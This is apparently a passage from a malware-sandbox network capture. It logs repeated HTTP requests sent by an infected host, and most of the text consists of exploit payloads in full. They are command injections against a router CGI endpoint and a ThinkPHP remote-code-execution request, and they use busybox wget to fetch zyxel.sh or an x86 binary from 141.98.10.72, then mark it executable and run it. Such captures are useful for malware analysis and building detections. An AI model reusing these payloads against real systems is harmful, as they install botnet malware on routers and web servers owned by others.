                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        859192.168.2.143522631.136.126.988080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.143172979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:56.772586107 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:58.052534103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:00.708369970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:05.828336954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:16.067754984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:36.546824932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        860192.168.2.144131831.136.192.1498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.162131071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:56.868525982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:58.244478941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.220312119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:06.852147102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:17.859704971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:40.642786026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        861192.168.2.145047894.123.85.138080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.188129902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        862192.168.2.143779494.121.120.1568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.188214064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        863192.168.2.145343294.121.138.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.188309908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        864192.168.2.144387294.120.60.1808080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.188407898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        865192.168.2.144814095.216.207.10380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.322962999 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:56.549453974 CET322INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:56 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        866192.168.2.143385495.183.86.248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.425395012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:57.668530941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:59.108445883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.988235950 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.876059055 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:19.395751953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:42.690643072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        867192.168.2.144411894.123.185.208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.434526920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        868192.168.2.145456862.29.86.208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.437231064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        869192.168.2.144152694.121.78.1308080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.437329054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        870192.168.2.145299631.200.41.928080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.437450886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        871192.168.2.1456084112.74.82.24580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.441880941 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:56.790818930 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 14 Feb 2024 08:34:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
